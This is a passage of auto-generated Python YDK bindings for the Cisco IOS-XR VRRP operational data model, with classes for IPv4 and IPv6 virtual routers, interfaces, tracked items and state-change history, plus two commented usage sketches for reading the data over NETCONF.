_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, self).__init__()
self.yang_name = "ipv6-operational-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-operational-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress']['meta_info']
class Ipv6ConfiguredDownAddress(_Entity_):
"""
IPv6 Configured but Down VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, self).__init__()
self.yang_name = "ipv6-configured-down-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-configured-down-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress']['meta_info']
class TrackItemInfo(_Entity_):
"""
Track Item Info
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo, self).__init__()
self.yang_name = "track-item-info"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo, ['interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo']['meta_info']
class StateChangeHistory(_Entity_):
"""
State change history
.. attribute:: time
Time of state change
**type**\: :py:class:`Time <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time>`
**config**\: False
.. attribute:: old_state
Old State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: new_state
New State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: reason
Reason for state change
**type**\: :py:class:`VrrpStateChangeReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpStateChangeReason>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory, self).__init__()
self.yang_name = "state-change-history"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("time", ("time", Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time))])
self._leafs = OrderedDict([
('old_state', (YLeaf(YType.enumeration, 'old-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('new_state', (YLeaf(YType.enumeration, 'new-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('reason', (YLeaf(YType.enumeration, 'reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpStateChangeReason', '')])),
])
self.old_state = None
self.new_state = None
self.reason = None
self.time = Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time()
self.time.parent = self
self._children_name_map["time"] = "time"
self._segment_path = lambda: "state-change-history"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory, ['old_state', 'new_state', 'reason'], name, value)
class Time(_Entity_):
"""
Time of state change
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time, self).__init__()
self.yang_name = "time"
self.yang_parent_name = "state-change-history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters']['meta_info']
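# Usage sketch (not part of the generated bindings): the VirtualRouter list
# above is keyed by interface-name and virtual-router-id, and its
# _segment_path lambda builds the keyed XPath from those two attributes.
# Setting the key leafs before a read therefore selects a single list entry.
# The interface name, VRID, device address and credentials below are
# placeholders, not values from this module:
#
#   from ydk.services import CRUDService
#   from ydk.providers import NetconfServiceProvider
#   from ydk.models.cisco_ios_xr import Cisco_IOS_XR_ipv4_vrrp_oper as vrrp_oper
#
#   provider = NetconfServiceProvider(address="10.0.0.1",      # placeholder
#                                     username="admin", password="admin")
#   vr = vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter()
#   vr.interface_name = "GigabitEthernet0/0/0/0"               # key leaf
#   vr.virtual_router_id = 1                                   # key leaf
#   vr = CRUDService().read(provider, vr)
#   # vr.vrrp_state, vr.master_ipv6_address etc. are now populated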
class Interfaces(_Entity_):
"""
The VRRP interface table
.. attribute:: interface
A VRRP interface entry
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.Interfaces.Interface>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.Interfaces, self).__init__()
self.yang_name = "interfaces"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface", ("interface", Vrrp.Ipv6.Interfaces.Interface))])
self._leafs = OrderedDict()
self.interface = YList(self)
self._segment_path = lambda: "interfaces"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.Interfaces, [], name, value)
class Interface(_Entity_):
"""
A VRRP interface entry
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: invalid_checksum_count
Invalid checksum
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_version_count
Unknown/unsupported version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_vrid_count
Invalid vrID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_length_count
Bad packet lengths
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('invalid_checksum_count', (YLeaf(YType.uint32, 'invalid-checksum-count'), ['int'])),
('invalid_version_count', (YLeaf(YType.uint32, 'invalid-version-count'), ['int'])),
('invalid_vrid_count', (YLeaf(YType.uint32, 'invalid-vrid-count'), ['int'])),
('invalid_packet_length_count', (YLeaf(YType.uint32, 'invalid-packet-length-count'), ['int'])),
])
self.interface_name = None
self.interface = None
self.invalid_checksum_count = None
self.invalid_version_count = None
self.invalid_vrid_count = None
self.invalid_packet_length_count = None
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/interfaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.Interfaces.Interface, ['interface_name', 'interface', 'invalid_checksum_count', 'invalid_version_count', 'invalid_vrid_count', 'invalid_packet_length_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.Interfaces']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6']['meta_info']
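# Usage sketch (not part of the generated bindings): reading the whole
# operational tree and walking the IPv6 virtual-router list. Since this is
# an oper model (every node is config False), the bindings are read-only
# containers; device address and credentials are placeholders:
#
#   from ydk.services import CRUDService
#   from ydk.providers import NetconfServiceProvider
#   from ydk.models.cisco_ios_xr import Cisco_IOS_XR_ipv4_vrrp_oper as vrrp_oper
#
#   provider = NetconfServiceProvider(address="10.0.0.1",      # placeholder
#                                     username="admin", password="admin")
#   vrrp = CRUDService().read(provider, vrrp_oper.Vrrp())
#   for vr in vrrp.ipv6.virtual_routers.virtual_router:
#       print(vr.interface_name, vr.virtual_router_id, vr.vrrp_state)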
class Ipv4(_Entity_):
"""
IPv4 VRRP configuration
.. attribute:: interfaces
The VRRP interface table
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.Interfaces>`
**config**\: False
.. attribute:: track_items
The VRRP tracked item table
**type**\: :py:class:`TrackItems <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.TrackItems>`
**config**\: False
.. attribute:: virtual_routers
The VRRP virtual router table
**type**\: :py:class:`VirtualRouters <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interfaces", ("interfaces", Vrrp.Ipv4.Interfaces)), ("track-items", ("track_items", Vrrp.Ipv4.TrackItems)), ("virtual-routers", ("virtual_routers", Vrrp.Ipv4.VirtualRouters))])
self._leafs = OrderedDict()
self.interfaces = Vrrp.Ipv4.Interfaces()
self.interfaces.parent = self
self._children_name_map["interfaces"] = "interfaces"
self.track_items = Vrrp.Ipv4.TrackItems()
self.track_items.parent = self
self._children_name_map["track_items"] = "track-items"
self.virtual_routers = Vrrp.Ipv4.VirtualRouters()
self.virtual_routers.parent = self
self._children_name_map["virtual_routers"] = "virtual-routers"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4, [], name, value)
class Interfaces(_Entity_):
"""
The VRRP interface table
.. attribute:: interface
A VRRP interface entry
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.Interfaces.Interface>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.Interfaces, self).__init__()
self.yang_name = "interfaces"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface", ("interface", Vrrp.Ipv4.Interfaces.Interface))])
self._leafs = OrderedDict()
self.interface = YList(self)
self._segment_path = lambda: "interfaces"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.Interfaces, [], name, value)
class Interface(_Entity_):
"""
A VRRP interface entry
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: invalid_checksum_count
Invalid checksum
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_version_count
Unknown/unsupported version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_vrid_count
Invalid vrID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_length_count
Bad packet lengths
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('invalid_checksum_count', (YLeaf(YType.uint32, 'invalid-checksum-count'), ['int'])),
('invalid_version_count', (YLeaf(YType.uint32, 'invalid-version-count'), ['int'])),
('invalid_vrid_count', (YLeaf(YType.uint32, 'invalid-vrid-count'), ['int'])),
('invalid_packet_length_count', (YLeaf(YType.uint32, 'invalid-packet-length-count'), ['int'])),
])
self.interface_name = None
self.interface = None
self.invalid_checksum_count = None
self.invalid_version_count = None
self.invalid_vrid_count = None
self.invalid_packet_length_count = None
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/interfaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.Interfaces.Interface, ['interface_name', 'interface', 'invalid_checksum_count', 'invalid_version_count', 'invalid_vrid_count', 'invalid_packet_length_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.Interfaces']['meta_info']
class TrackItems(_Entity_):
"""
The VRRP tracked item table
.. attribute:: track_item
A configured VRRP IP address entry
**type**\: list of :py:class:`TrackItem <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.TrackItems.TrackItem>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.TrackItems, self).__init__()
self.yang_name = "track-items"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-item", ("track_item", Vrrp.Ipv4.TrackItems.TrackItem))])
self._leafs = OrderedDict()
self.track_item = YList(self)
self._segment_path = lambda: "track-items"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.TrackItems, [], name, value)
class TrackItem(_Entity_):
"""
A configured VRRP IP address entry
.. attribute:: interface_name (key)
The interface name to track
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_name (key)
The name of the tracked interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.TrackItems.TrackItem, self).__init__()
self.yang_name = "track-item"
self.yang_parent_name = "track-items"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id','tracked_interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('tracked_interface_name', (YLeaf(YType.str, 'tracked-interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface_name = None
self.virtual_router_id = None
self.tracked_interface_name = None
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']" + "[tracked-interface-name='" + str(self.tracked_interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/track-items/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.TrackItems.TrackItem, ['interface_name', 'virtual_router_id', 'tracked_interface_name', 'interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.TrackItems.TrackItem']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.TrackItems']['meta_info']
class VirtualRouters(_Entity_):
"""
The VRRP virtual router table
.. attribute:: virtual_router
A VRRP virtual router
**type**\: list of :py:class:`VirtualRouter <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters, self).__init__()
self.yang_name = "virtual-routers"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("virtual-router", ("virtual_router", Vrrp.Ipv4.VirtualRouters.VirtualRouter))])
self._leafs = OrderedDict()
self.virtual_router = YList(self)
self._segment_path = lambda: "virtual-routers"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters, [], name, value)
class VirtualRouter(_Entity_):
"""
A VRRP virtual router
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: resign_sent_time
Time last resign was sent
**type**\: :py:class:`ResignSentTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime>`
**config**\: False
.. attribute:: resign_received_time
Time last resign was received
**type**\: :py:class:`ResignReceivedTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime>`
**config**\: False
.. attribute:: interface_name_xr
IM Interface Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: version
VRRP Protocol Version
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: address_family
Address family
**type**\: :py:class:`VrrpBAf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBAf>`
**config**\: False
.. attribute:: session_name
Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: slaves
Number of slave groups following this group's state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: is_slave
Group is a slave group
**type**\: bool
**config**\: False
.. attribute:: followed_session_name
Followed Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: secondary_address_count
Configured VRRP secondary address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_address_count
Operational VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: primary_virtual_ip
Configured IPv4 Primary address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: configured_down_address_count
Configured but Down VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: virtual_linklocal_ipv6_address
Virtual link-local IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: primary_state
State of primary IP address
**type**\: :py:class:`VrrpVipState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVipState>`
**config**\: False
.. attribute:: master_ip_address
Master router real IP address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_ipv6_address
Master router real IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_priority
Master router priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: vrrp_state
VRRP state
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: authentication_type
Authentication type
**type**\: :py:class:`VrrpProtAuth <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpProtAuth>`
**config**\: False
.. attribute:: authentication_string
Authentication data
**type**\: str
**config**\: False
.. attribute:: configured_advertize_time
Configured advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: oper_advertize_time
Operational advertize time
**type**\: int
